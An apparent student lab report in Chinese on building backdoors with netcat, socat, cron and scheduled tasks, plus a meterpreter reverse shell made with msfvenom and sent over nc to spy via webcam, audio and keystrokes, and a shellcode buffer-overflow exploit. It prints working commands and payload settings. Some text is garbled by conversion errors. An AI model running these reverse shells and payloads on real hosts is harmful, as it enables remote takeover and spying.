使用 netcat 獲取主機操做 Shell,cron 啓動shell
使用 socat 獲取主機操做 Shell, 任務計劃啓動vim
使用 MSF meterpreter 生成可執行文件,利用 ncat 傳送到主機並運行獲取主機 Shell
windows
使用 MSF meterpreter 生成獲取目標主機音頻、攝像頭、擊鍵記錄,並嘗試提權tcp
瀏覽掛馬網頁性能
下載惡意軟件編碼
打開可疑優盤spa
修改註冊表項,開機自啓動命令行
設定啓動週期,定時啓動3d
開啓監聽,知足特定條件後反彈啓動調試
能夠簡化任務建立多個會話
工做模式是純內存的,難以監測,不留痕跡
跟蹤可疑進程
檢查註冊表項
更新病毒庫並及時查看殺毒軟件的提示信息
實驗用 Win 選擇 XP 系統
下載 netcat 並解壓,關閉防火牆
kali 關閉防火牆
ufw disable
windows 打開監聽
查看 windows IP
ipconfig
在 kali 環境下使用 vim 編寫定時任務
crontab -e
將編寫格式 mark 以下
3 月 23 日 21 時 33 分反彈鏈接,發送 shell
xp 得到 kali shell
windows 添加計劃任務
開始→控制面板→性能和維護→計劃任務→添加計劃任務
涉及到組策略調整或用戶密碼設置
添加參數,重定向命令行
kali 鏈接
出現亂碼的緣由是兩者使用不一樣的中文編碼方式
查看 kali IP
ifconfig
使用 meterpreter 生成後門程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.176.130 LPORT=4306 -f exe > 20164306.exe
kali 向本地端口發送文件
nc -l 4306 < 20164306.exe
windows 從 kali 處接收文件
nc.exe 192.168.176.131 4306 > 20164306.exe
進入 msfconsole 進行相關設置
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.176.130 set LPORT 4306
開啓監聽
exploit
運行 Windows 上的後門程序後,kali 獲得了控制權
控制攝像頭的相關指令,通常狀況下,使用前首先使用 list 檢查是否有可用設備
獲取音頻截屏鍵盤記錄提權啥的相似輸指令浪就完事了,如下是實驗結果
除了實驗中嘗試的後門實現方法,網頁後門、帳號後門、C/S後門也是經常使用的攻擊手段
實際生活中用於蒐集信息的一些反饋錯誤程序、調查提交程序實質上與後門無異,它們會控制主機自動鏈接其它設備並進行數據交互
咱們須要認識到後門的危險性,積極防範,警戒上述程序被攻擊者利用
在 kali 環境下實驗,經過不一樣終端操做,攻擊者、靶機 ip 地址相同(我連我本身)
實驗用 pwn3 爲 pwn1 的備份文件,修改權限爲 777,關閉地址隨機化,開啓堆棧可執行(詳見 Exp1)
MSF 關鍵參數 mark
生成 shellcode,規避 「\x00\x0a」 ,以 c 的形式輸出到文件 shellcode 中(-o)
規範格式,去除文件中的引號、回車等字符,以便構造 payload
構造 payload 並輸出到 shellcode 文件中,內容爲上述字符串補 32 個 A 和一串 \x90,地址待定
調試,肯定返回地址
在另外一個終端裏 gdb(詳見 Exp1)
將對應的 \x90 替換爲具體地址(落在nop區任意位置便可)
此時payload構造完成,打開新終端模擬攻擊者,進入控制檯完成配置並開啓監聽
運行 pwn3 ,注入 payload,鏈接成功!